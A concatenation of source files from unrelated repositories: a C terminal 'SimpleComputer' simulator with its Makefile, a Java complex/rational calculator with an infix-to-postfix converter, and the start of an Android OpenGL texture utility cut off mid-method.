1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0 }; char bigchar_B[64] = { 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0 }; char bigchar_C[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_D[64] = { 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0 }; char bigchar_E[64] = { 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0 }; char bigchar_F[64] = { 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 }; char bigchar_PLUS[64] = { 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0 }; char *ind[17] = {bigchar_0, bigchar_1, bigchar_2, bigchar_3, bigchar_4, bigchar_5, bigchar_6, bigchar_7, bigchar_8, bigchar_9, bigchar_A, bigchar_B, bigchar_C, bigchar_D, bigchar_E, bigchar_F, bigchar_PLUS}; void init_sig_handlers() { signal(SIGALRM, cell_step); signal(SIGUSR1, return_hand_manage); timer.it_value.tv_sec = 4; timer.it_value.tv_usec = 0; timer.it_interval.tv_sec = 1; timer.it_interval.tv_usec = 500; setitimer(ITIMER_REAL, &timer, NULL); regSet(FLAG_INTERRUPT, 0x1); } void return_hand_manage(int sig) { regSet(FLAG_INTERRUPT, 1); } void cell_step(int sig) { int val; regGet(FLAG_INTERRUPT, &val); if(val == 0) { cur_cell = inst_cnt; print_ram(&cur_cell); print_inst_cnt(); print_operation(); print_cur_cell(); print_flags(); inst_cnt++; if(inst_cnt > 0x63) inst_cnt = 0; } } int set_non_canonical_regime(int vmin, int echo) { if(set_term_regime(0, 0, vmin, echo, 1)) return 0; else return -1; } void key_handler(enum keys key) { char buf[4]; read_key(&key); int val; regGet(FLAG_INTERRUPT, &val); if(key == i_key) { raise(SIGUSR1); } if(val == 1) { switch(key) { case up_key: // cur_cell -= 0xA; break; case down_key: // cur_cell += 0xA; break; case left_key: // cur_cell -= 0x1; break; case right_key: //change cells cur_cell += 0x1; break; case q_key: //exit hand_exit = 0x0; break; case f5_key: //set accumulator set_non_canonical_regime(0x4, 0x0); read(FD, buf, sizeof(buf)); acc = atoi(buf); set_non_canonical_regime(0x1, 0x0); break; case f6_key: //set instruction counter inst_cnt = cur_cell; break; case t_key: setitimer(ITIMER_REAL, &timer, NULL); regSet(FLAG_INTERRUPT, 0); break; case enter_key: set_non_canonical_regime(0x4, 0x0); read(FD, buf, sizeof(buf)); RAM[cur_cell] = atoi(buf); set_non_canonical_regime(0x1, 0x0); break; default: key = other_key; break; } } if(cur_cell > 0x63)// 0x63 = 99 cur_cell = 0x0; if(cur_cell < 0x0) cur_cell = 0x63; memGet(cur_cell, &operation); } void print_cur_cell() { int start_x = 45; const int y = 16; int big[2] = {0, 0}; int tmp = RAM[cur_cell]; for(int i = 0; i < 4; i++) { transform_bchar(ind[tmp % 10], big); printchar(big, start_x, y, BLUE, DEFAULT); start_x -= 9; tmp /= 10; } transform_bchar(ind[16], big); //bigchar PLUS is 17 element in array printchar(big, start_x, y, YELLOW, DEFAULT); } void print_ram(int *cell) { for(int i = 0; i < memory_size / 10; i++) { term_xy(RAM_X + 1, RAM_Y + i + 1); for(int j = 0; j < memory_size / 10; j++) { char buf[6]; sprintf(buf, "+%04d ", RAM[i * 10 + j]); if(*cell == i * 10 + j) bg_color(GREEN); write(FD, buf, strlen(buf)); bg_color(DEFAULT); } } } void print_acc() { term_xy(ACC_X + 9, ACC_Y + 1); char buf[5]; sprintf(buf, "+%04d", acc); write(FD, buf, strlen(buf)); } void print_inst_cnt() { term_xy(INST_CNT_X + 9, INST_CNT_Y + 1); char buf[5]; sprintf(buf, "+%04d", inst_cnt); write(FD, buf, strlen(buf)); } void print_operation() { term_xy(OPER_X + 7, OPER_Y + 1); char buf[8]; sprintf(buf, "+%02d : %02d", operation / 100, operation % 100); write(FD, buf, strlen(buf)); } void print_flags() { int start_x = 64 + 1; const int y = 11 + 1; fg_color(GREEN); for(int i = 0; i < 5; i++) { int val; regGet(i+1, &val); term_xy(start_x, y); if(val == 1) { char flag[4]; sprintf(flag, "%c", flags[i]); write(FD, flag, strlen(flag)); } else write(FD, " ", 1); start_x += 4; } fg_color(DEFAULT); } void transform_bchar(char *sym, int *big) //transform bigchar to int big[2] { int x, y; for(int i = 0; i < 64; i++) { x = i % 8; y = i / 8; setcharpos(big, x, y, sym[i]); } }<file_sep>CMP = gcc CFLAGS = -Wall -c LFLAGS = -Llib -lSC -lMTBC -g -o BDIR = "build/SimpleComputer" all: main main: build/main.o build/cmp.o build/mf.o build/rk.o lib/libSC.a lib/libMTBC.a tasm build/cmd_handler.o build/alu.o @mkdir -p bin @echo "\033[32mBuild main: \033[0m" $(CMP) build/main.o build/cmp.o build/cmd_handler.o build/alu.o build/mf.o build/rk.o $(LFLAGS) bin/SimpleComputer @echo "\033[35m*************************************" @echo "Input /"make run"/ for start program" @echo "*************************************\033[0m" tasm: asm_translator/tasm.c @mkdir -p bin @$(CMP) asm_translator/tasm.c -Llib -lSC -o bin/tasm build/main.o: main.c @mkdir -p build @$(CMP) $(CFLAGS) main.c -o $@ build/cmp.o: cmp.c @mkdir -p build @$(CMP) $(CFLAGS) cmp.c -o $@ build/alu.o: cpu/alu.c @mkdir -p build @$(CMP) $(CFLAGS) cpu/alu.c -o $@ build/cmd_handler.o: cpu/cmd_handler.c @mkdir -p build @$(CMP) $(CFLAGS) cpu/cmd_handler.c -o $@ build/mf.o: main_frame/mf.c @mkdir -p build @$(CMP) $(CFLAGS) main_frame/mf.c -o $@ build/rk.o: read_keys/rk.c @mkdir -p build @$(CMP) $(CFLAGS) read_keys/rk.c -o $@ lib/libSC.a: build/sc.o @echo "\033[32mBuild Simple Computer static lib: \033[0m" @mkdir -p lib ar rc lib/libSC.a build/sc.o ranlib lib/libSC.a lib/libMTBC.a: build/mt.o build/bc.o @echo "\033[32mBuild My Term & Big Char static lib: \033[0m" @mkdir -p lib ar rc lib/libMTBC.a build/mt.o build/bc.o ranlib lib/libMTBC.a build/sc.o: simple_computer/sc.c @mkdir -p build @$(CMP) $(CFLAGS) simple_computer/sc.c -o $@ build/mt.o: my_term/mt.c @mkdir -p build @$(CMP) $(CFLAGS) my_term/mt.c -o $@ build/bc.o: big_chars/bc.c @mkdir -p build @$(CMP) $(CFLAGS) big_chars/bc.c -o $@ re: clean main run: @./bin/SimpleComputer clean: rm -rf build bin lib
f8cd42cc03cfaa13fe30344793cd2c79eaa117b9
[ "Markdown", "C", "Makefile" ]
20
C
M1dNightSIB/ArchCourse
39982e4ce9e606fefd3fa6da9b22596f01cd08f5
f68a4ea9775b9873eadfa0f88bc95f2d945633a8
refs/heads/master
<file_sep>import java.util.*; public class Calculator { public static final String OPERATORS = "+-*/()"; public static String calculate(ArrayList<String> tok, int id) { StackOfOperands stack = new StackOfOperands(); ArrayList<Object> obj = new ArrayList<>(); for (int i = 0; i < tok.size(); i++) { if (OPERATORS.indexOf(tok.get(i)) == -1) { Numbers a = null; if (id == 0) { a = new Real(); } else if (id == 1) { a = new Rational(); } else if (id == 2) { a = new Complex(); } obj.add(a.parse(tok.get(i))); } else { obj.add(tok.get(i)); } } for (Object a : obj) { if (a instanceof String) { if (a.equals("+")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.add(a2)); } else if (a.equals("-")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.subtract(a2)); } else if (a.equals("*")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.multiply(a2)); } else if (a.equals("/")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.divide(a2)); } } else { stack.push((Numbers) a); } } if (stack.oSize() == 1) return "= " + stack.oPop(); else throw new IllegalArgumentException("Wrong arguments"); } } <file_sep> public class Complex implements Numbers { private double re; private double im; Complex(double rea, double ima) { re = rea; im = ima; } Complex() { } public String toString() { String a; if (im < 0) { a = String.format("[%.2f, %.2fi]", re, (-im)); return a; } a = String.format("[%.2f, %.2fi]", re, im); return a; } // (a+bi)+(c+di)=(a+c)+(b+d)i. public Complex add(Complex b) { Complex a = this; double real = a.re + b.re; double imag = a.im + b.im; return new Complex(real, imag); } // (a+bi)-(c+di)=(a-c)+(b-d)i.\ public Complex subtract(Complex b) { Complex a = this; double real = a.re - b.re; double imag = a.im - b.im; return new Complex(real, imag); } public Complex multiply(Complex b) { Complex a = this; double real = a.re * b.re - a.im * b.im; double imag = a.re * b.im + a.im * b.re; return new Complex(real, imag); } public Complex reciprocal() { double scale = re * re + im * im; return new Complex(re / scale, -im / scale); } public Complex divide(Complex b) { Complex a = this; return a.multiply(b.reciprocal()); } @Override public Numbers add(Numbers other) { return ((Complex) this).add((Complex) other); } @Override public Numbers subtract(Numbers other) { return ((Complex) this).subtract((Complex) other); } @Override public Numbers multiply(Numbers other) { return ((Complex) this).multiply((Complex) other); } @Override public Numbers divide(Numbers other) { return ((Complex) this).divide((Complex) other); } @Override public Numbers parse(String com) { Double r1 = Double.parseDouble(com.substring(0, com.indexOf(","))); Double i2 = Double.parseDouble(com.substring(com.indexOf(",") + 1, com.indexOf("i"))); return new Complex(r1, i2); } } <file_sep> import java.util.*; public class Converter { public static final String OPERATORS = "+-*/()"; public static ArrayList parseTokens(String a) { Scanner sc = new Scanner(a); ArrayList<String> out = new ArrayList<>(); for (int i = 0; i < a.length(); i++) { if (a.charAt(i) == '[') { String z = new String(); i++; while (a.charAt(i) != ']') { z += a.charAt(i); i++; } out.add(z); continue; } else if (a.charAt(i) == '-' ? (a.charAt(i + 1) == ' ') : OPERATORS.indexOf(a.charAt(i)) != -1) { String z = new String(); z += a.charAt(i); out.add(z); continue; } else { String z = new String(); while (Character.isDigit(a.charAt(i)) || a.charAt(i) == '.' || a.charAt(i) == '-' && a.charAt(i) != ' ') { z += a.charAt(i); i++; if (i == a.length()) break; } if (z.length() != 0) if (z.charAt(0) != ' ') { out.add(z); --i; } } } return out; } public static ArrayList in2po(ArrayList<String> token) { ArrayList<String> out = new ArrayList<String>(); StackOfOperands stack = new StackOfOperands(); for (int i = 0; i < token.size(); i++) { String z = token.get(i); int ind = OPERATORS.indexOf(z.charAt(0)); if (z.charAt(0) == '-' ? z.length() > 1 : Character.isDigit(z.charAt(0))) { // if token is a number out.add(z); continue; } else if (ind != -1 && ind < 4) // if token is operator except "(" ")" { if (!stack.isEmpty()) while (!stack.isEmpty() && Prec(stack.peek().charAt(0)) >= Prec(z.charAt(0))) out.add(stack.pop()); stack.push(z); continue; } else if (z.charAt(0) == '(') { stack.push(z); continue; } else if (z.charAt(0) == ')') { while (!stack.isEmpty() && stack.peek().charAt(0) != '(') out.add(stack.pop()); if (!stack.isEmpty() && stack.peek().charAt(0) != '(') throw new IllegalArgumentException("Invalid Expression"); // invalid expression else stack.pop(); continue; } } while (!stack.isEmpty()) out.add(stack.pop()); return out; } static int Prec(char ch) { switch (ch) { case '+': case '-': return 1; case '*': case '/': return 2; } return -1; } }
30399ea7c2920c17fe60fcef941bd4ebb2980711
[ "Java" ]
3
Java
MrBrother/Calculator-on-Java
e2b7baa52797ef1864c1deb32ce833f2ccc5366d
e60032d5bc951123d003cdf372b92caf047f12e9
refs/heads/master
<file_sep>/// All possible configuration errors. public enum ConfigurationError: Error { /// The configuration didn't match internal expectations. case unknownConfiguration /// The configuration had both `match_kind` and `excluded_match_kind` parameters. case ambiguousMatchKindParameters } <file_sep>import SourceKittenFramework public struct InclusiveLanguageRule: ASTRule, ConfigurationProviderRule { public var configuration = InclusiveLanguageConfiguration() public init() {} public static let description = RuleDescription( identifier: "inclusive_language", name: "Inclusive Language", description: """ Identifiers should use inclusive language that avoids discrimination against groups of people based on \ race, gender, or socioeconomic status """, kind: .style, nonTriggeringExamples: InclusiveLanguageRuleExamples.nonTriggeringExamples, triggeringExamples: InclusiveLanguageRuleExamples.triggeringExamples ) public func validate(file: SwiftLintFile, kind: SwiftDeclarationKind, dictionary: SourceKittenDictionary) -> [StyleViolation] { guard kind != .varParameter, // Will be caught by function declaration let name = dictionary.name, let nameByteRange = dictionary.nameByteRange else { return [] } let lowercased = name.lowercased() guard let term = configuration.allTerms.first(where: lowercased.contains) else { return [] } return [ StyleViolation( ruleDescription: Self.description, severity: configuration.severity, location: Location(file: file, byteOffset: nameByteRange.location), reason: "Declaration \(name) contains the term \"\(term)\" which is not considered inclusive." ) ] } }
1fd77f15960f49dc0d24969fff5c350cdea09348
[ "Swift" ]
2
Swift
namolnad/SwiftLint
07f559549a014f23ce87f572df37c6db7bba7a5d
fd5ce985391e768454ae4c6ca48034a052872bdc
refs/heads/master
<file_sep>""" (from https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/asynch_api_batches_interpret_status.htm) The following list gives you more details about the various states, also known as statuses, of a batch. The batch state informs you whether you should proceed to get the results or whether you need to wait or fix errors related to your request. Queued ******* Processing of the batch has not started yet. If the job associated with this batch is aborted, the batch isn’t processed and its state is set to Not Processed. InProgress *********** The batch is being processed. If the job associated with the batch is aborted, the batch is still processed to completion. You must close the job associated with the batch so that the batch can finish processing. Completed ********** The batch has been processed completely, and the result resource is available. The result resource indicates if some records have failed. A batch can be completed even if some or all the records have failed. If a subset of records failed, the successful records aren’t rolled back. Failed ******* The batch failed to process the full request due to an unexpected error, such as the request is compressed with an unsupported format, or an internal server error. Even if the batch failed, some records could have been completed successfully. If the numberRecordsProcessed field in the response is greater than zero, you should get the results to see which records were processed, and if they were successful. Not Processed ************** The batch won’t be processed. This state is assigned when a job is aborted while the batch is queued. For bulk queries, if the job has PK chunking enabled, this state is assigned to the original batch that contains the query when the subsequent batches are created. After the original batch is changed to this state, you can monitor the subsequent batches and retrieve each batch’s results when it’s completed. """ ABORTED = 'Aborted' FAILED = 'Failed' NOT_PROCESSED = 'Not Processed' COMPLETED = 'Completed' ERROR_STATES = ( ABORTED, FAILED, NOT_PROCESSED, ) <file_sep>from .salesforce_bulk import SalesforceBulk from .csv_adapter import CsvDictsAdapter __version__ = '1.1.0BV'
4a7ac76faa67193c5b8da8a179ff571996d7b7a5
[ "Python" ]
2
Python
bluevine-dev/salesforce-bulk
e0f32937ddec072da371b10206bf68d3d896a439
34585757aa17ecf3aa6d5f0b62ec05556cf7b8a6
refs/heads/master
<file_sep>require 'json' require 'securerandom' require 'time' require 'net/http' require 'uri' $error = false $uuid = SecureRandom.uuid $out_file = File.new(".debug.log", 'w') $out_file.flush def $stdout.write message if message.gsub(/\r?\n/, "") != '' date = ::Time.now append "info", date.utc.iso8601(6), message date_string=date.strftime("%d.%m.%Y %T") message=date_string + " " + message.gsub(/\r\n/, "\n") end super message end def $stderr.write message $error = true if message.gsub(/\r?\n/, "") != '' date = ::Time.now append "error", date.utc.iso8601(6), message date_string=date.strftime("%d.%m.%Y %T") message=date_string + " " + message.gsub(/\r\n/, "\n") end super message end def append type, date_string, message tempHash = { "@timestamp" => date_string, "uuid" => $uuid, "log_type" => type, "message" => message.encode('utf-8', 'binary', :undef => :replace) } $out_file.write JSON.generate(tempHash) + "\n" $out_file.flush end at_exit do if ($error) if((ENV["SENDERROR"] || "") != "") puts "Read senderror from ENV: #{ENV["SENDERROR"]}" @send = ENV["SENDERROR"] else print "Send the Error to the LiDOP team: [yes]: " @send = STDIN.gets.chomp end if(@send == "" || @send == "yes") uri = URI.parse("http://listener.logz.io:8070?token=B<KEY>&type=http_bulk") request = Net::HTTP::Post.new(uri) request.body = "" request.body << File.read(".debug.log") req_options = { use_ssl: uri.scheme == "https", } response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http| http.request(request) end puts "Result: #{response.code}" end end end <file_sep>require 'yaml' require 'fileutils' require "open3" # load all needed vagrant helper files Dir["#{File.dirname(__FILE__)}/vagrant/Vagrantfile.*.rb"].each {|file| require file } # if the .config file not exists, create a default one out of the template config_file="#{File.dirname(__FILE__)}/.lidop_config.yaml" if(File.exist?(config_file)) else FileUtils.cp("#{File.dirname(__FILE__)}/templates/lidop_config.yaml", config_file) end config_file="#{File.dirname(__FILE__)}/.vagrant_config.yaml" if(File.exist?(config_file)) else FileUtils.cp("#{File.dirname(__FILE__)}/templates/vagrant_config.yaml", config_file) end # init new settins (user and password question) settings = Settings.new # load the configuration out of *.config.yaml configuration = settings.readConfig # ask for username and password if ARGV.include? "up" or ARGV.include? "provision" if(File.exist?(".env")) File.open('.env').each do |line| puts "Set #{line.split('=')[0]} to #{line.split('=')[1]}" ENV[line.split('=')[0].strip] = line.split('=')[1].strip end end settings.init() end # start vagrant part Vagrant.configure("2") do |config| # if a extend script is defined, copy the file to remote machine if "#{ENV['LIDOP_EXTEND']}" != "" config.vm.provision "file", source: ENV['LIDOP_EXTEND'], destination: "/vagrant/extensions/extend.yml" end # define default installation script ansible_script = <<-SCRIPT export ANSIBLE_CONFIG=/vagrant/install/ansible.cfg export LIDOP_EXTEND=#{ENV['LIDOP_EXTEND_NEW']} export ANSIBLE_VAULT_PASSWORD=<PASSWORD> dos2unix /vagrant/install/vault-env chmod +x /vagrant/install/vault-env ansible-playbook /vagrant/install/install.yml --vault-password-file /vagrant/install/vault-env -e ' root_password=#{settings.<PASSWORD>} root_user=#{settings.user_name} SCRIPT # define default test script test_script = <<-SCRIPT docker run --rm \ -v /vagrant/tests/:/serverspec \ -v /var/lidop/www/tests/:/var/lidop/www/tests/ \ -e USERNAME=#{settings.user_name} \ -e PASSWORD=#{<PASSWORD>} \ -e HOST=$IPADDRESS \ -e HOSTNAME=$HOSTNAME \ -e TEST_HOST=$TEST_HOST \ registry.service.lidop.local:5000/lidop/serverspec:#{configuration["docker_image_version"]} test SCRIPT # no parallel start of the machines ENV['VAGRANT_NO_PARALLEL'] = 'yes' # read the number of workers and loop workers = configuration["nodes"] (0..workers).each do |worker| # set the name of the vagrant machine config.vm.define "lidop_#{worker}" do |machine_config| # set the hostname machine_config.vm.hostname = "LiDOP#{worker}" # common scripts if configuration["install_mode"]== "online" machine_config.vm.provision "shell", path: "./scripts/ansible.sh" end # script for virtualbox machine_config.vm.provider :virtualbox do |v, override| Virtualbox.init(v, override, worker, settings, configuration, ansible_script, test_script) if(worker == workers) override.vm.provision "show_info", type: "show_info" end end end end end<file_sep># LiDOP A easy to use DevOps playground. Can be started local or in AWS. ## Getting Started These instructions will get you a copy of the project up and running on your local machine for development and testing purposes [Installation](./install/Readme.md) ## High Level Architecture | Layer | Tools | Description | ------------------------- | ------------------- | ---------------------- | `Plugins` | Code | Example code and pipelines | `Test installation` | Serverspec | Test Installation | `Provisioning` | Ansible | Install LiDOP | `Infrastructure option 1` | AWS Cloud Formation | For starting LiDOP in AWS | `Infrastructure option 2` | Terraform | For starting LiDOP in cloud (AWS) | `Infrastructure option 3` | Vagrant | For starting LiDOP on a local machine # Special note for the Vagrant way ## Prerequisites The following Software must be installed to run LiDOP - Virtualbox https://www.virtualbox.org/wiki/Downloads - Vagrant https://www.vagrantup.com/downloads.html ## Starting *On a windows machine, use cmd or powershell and not git bash for executing vagrant up* ``` git clone https://github.com/LivingDevOps/LiDOP.git cd lidop vagrant up ``` # Infrastructure general The default and testet infrastrucutre OS, is a Ubuntu 16.10. The following changes will be executed during the ansible execution (be care full, if you run the ansible-playbook on a existing machine) ## Prerequisites One Jenkins Slave is installed on the host machine, therefore we change the ssh settings on the host machine: - enable login with user and password ## Software The following software will be installed during the ansible execution: - nfs-kernel-server - java jre (for jenkins slave) - python-pip - python-pexpect - dos2unix ## Network The DNS settings will be changed. There is a Consul service running which will be the default DNS resolver for the host. # Provisioning The installation is done with Ansible (99% of it). There is one script, which will install ansible on the host machine (yes we execute ansible direct on the host). ## High Level process 1. Execution of ./scripts/ansible.sh. This script installs Ansible and needed ansible modules. 2. Execution of the ansible playbook ./install/install.yml - Ansible Role "lidop_host_preparation". Installation and configuration of the host - Ansible Role "docker". Installation and configuration of docker - Ansible Role "lidop". Installation and configuration of LiDOP # Test installation The most of the ansible steps are testet after each step. Never the less, there are some server spec tests which will be executed at the end of the installation ## Plugins description is coming soon<file_sep>require 'net/http' require "open3" module LocalCommand class Config < Vagrant.plugin("2", :config) attr_accessor :message end class Plugin < Vagrant.plugin("2") name "show_info" config(:show_info, :provisioner) do Config end provisioner(:show_info) do Provisioner end end class Provisioner < Vagrant.plugin("2", :provisioner) def provision base_url, s1 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/base_url?raw)'" secret_password, s2 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/secret_password?raw)'" root_user, s2 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/root_user?raw)'" print("\n#############################################################\n" \ "LiDOP ist ready to use. \n" \ "#############################################################\n" \ "Access under: #{base_url}" \ "User: #{root_user}" \ "Password: the <PASSWORD> you entered on startup\n" \ "Secret Password: #{<PASSWORD>_<PASSWORD>}" \ "#############################################################\n" ) end end end<file_sep>#!/bin/bash echo $ANSIBLE_VAULT_PASSWORD<file_sep>#!/usr/bin/env bash echo "###########################################################" echo "Install ansible" echo "###########################################################" sudo apt-get update sudo apt-get install -y software-properties-common sudo apt-add-repository -y ppa:ansible/ansible sudo apt-get update sudo apt-get install -y \ ansible \ python-pip \ python-pexpect \ dos2unix echo "###########################################################" ansible --version echo "###########################################################"
2399b7520c2e3959d3c49411ce247f21cfd338d7
[ "Markdown", "Ruby", "Shell" ]
6
Ruby
thiyagsdevops/devops
da5358cefd74a4e9481a4f3126c82b62bd29f48d
ab03766f50af6227adfe6ce612aefeebd9bb873f
refs/heads/master
<repo_name>azhouSummer/JWebAssembly<file_sep>/src/de/inetsoftware/jwebassembly/wasm/WasmOptions.java /* * Copyright 2017 - 2019 <NAME> (i-net software) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package de.inetsoftware.jwebassembly.wasm; import java.util.HashMap; import de.inetsoftware.jwebassembly.JWebAssembly; import de.inetsoftware.jwebassembly.module.FunctionName; /** * The option/properties for the behavior of the compiler. * * @author <NAME> */ public class WasmOptions { private final boolean debugNames; private final boolean useGC; /** * NonGC function for ref_eq polyfill. */ public FunctionName ref_eq; /** * Create a new instance of options * * @param properties * compiler properties */ public WasmOptions( HashMap<String, String> properties ) { debugNames = Boolean.parseBoolean( properties.get( JWebAssembly.DEBUG_NAMES ) ); useGC = Boolean.parseBoolean( properties.getOrDefault( JWebAssembly.WASM_USE_GC, "false" ) ); } /** * Property for adding debug names to the output if true. * * @return true, add debug information */ public boolean debugNames() { return debugNames; } /** * If the GC feature of WASM should be use or the GC of the JavaScript host. * * @return true, use the GC instructions of WASM. */ public boolean useGC() { return useGC; } }
2109183fa727b486cb87c77af75e1050b4f3e105
[ "Java" ]
1
Java
azhouSummer/JWebAssembly
aba8052de099fb4fb948479b2b5268b5d99580fd
5bbf3c4066f3a0d8a0979b24d3191a91bcbaaf3e
refs/heads/master
<file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import java.io.IOException; import java.io.InputStream; import javax.microedition.khronos.egl.EGL10; import javax.microedition.khronos.egl.EGLContext; import android.content.Context; import android.graphics.Bitmap; import android.graphics.BitmapFactory; import android.opengl.GLES20; import android.opengl.GLUtils; /** * OpenGl utility class. * */ public class OpenGLUtils{ public static Logger logger = new Logger(OpenGLUtils.class); /** * Constant: no OpenGl texture */ public static int NO_TEXTURE_ID = 0; /** * Creates an OpenGl texture, filling it with the given bitmap's pixels. * @param bitmap a bitmap object * @param sampleMode a value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter * @param wrapMode a value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter * @return id of the allocated OpenGl texture */ public static int bitmapToOpenGL(Bitmap bitmap, int sampleMode, int wrapMode){ return bitmapToOpenGL(bitmap, NO_TEXTURE_ID, sampleMode, wrapMode); } public static int generateTexture(boolean bBindTexture){ return generateTexture(NO_TEXTURE_ID, bBindTexture); } public static int generateTexture(int textureId, boolean bBindTexture){ int textures[] = new int[1]; if (textureId==NO_TEXTURE_ID){ GLES20.glGenTextures(1, textures, 0); textureId = textures[0]; } GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); return textureId; } /** * Creates or overwrites an OpenGl texture, filling it with the given bitmap's pixels. * @param bitmap a bitmap object * @param textureId OpenGl texture id. If this value equals {@link #NO_TEXTURE_ID}, a new OpenGl texture will be created. * @param sampleMode a value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter * @param wrapMode a value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter * @return OpengGl texture id */ public static int bitmapToOpenGL(Bitmap bitmap, int textureId, int sampleMode, int wrapMode){ int textures[] = new int[1]; if (textureId==NO_TEXTURE_ID){ GLES20.glGenTextures(1, textures, 0); textureId = textures[0]; } GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_S, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_T, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MAG_FILTER, sampleMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MIN_FILTER, sampleMode); if (Logger.LOG_ENABLED) logger.i("bitmapToOpenGL: " + bitmap.getWidth() + "," + bitmap.getHeight() + " | " + wrapMode + "," + sampleMode); GLUtils.texImage2D(GLES20.GL_TEXTURE_2D, 0, bitmap, 0); if (GLES20.glGetError()>0){ Utils.alertAndAssert("bitmapToOpenGL failed!"); } return textureId; } /** * Loads a bitmap from the given filename and location into the provided OpenGl texture and generates mipmaps for it. * This method searches for additional image files in the provided location folder for the different mipmap levels. * For example: if the filename is image.png, the method will look for a image_i.png file for the i-th mipmap level. * @param context An Android context. * @param filename The image filename. * @param location The folder, where the image is located. If location is null, the method expects the file to be located in the assets folder of the application. * @param textureId A value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter. * @param sampleMode A value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter. * @param wrapMode A value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter. * @return OpengGl texture id. */ public static boolean generateMipmaps(Context context, String filename, String location, int textureId, int sampleMode, int wrapMode) { InputStream is = null; String res[] = Utils.splitFilenameAndExt(filename); int errCode; if (res==null){ //can't split filename, that's odd return false; } String fn = res[0]; String ext = res[1]; if (Logger.LOG_ENABLED) logger.i("generateMipmaps / bind texture " + textureId); GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_S, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, 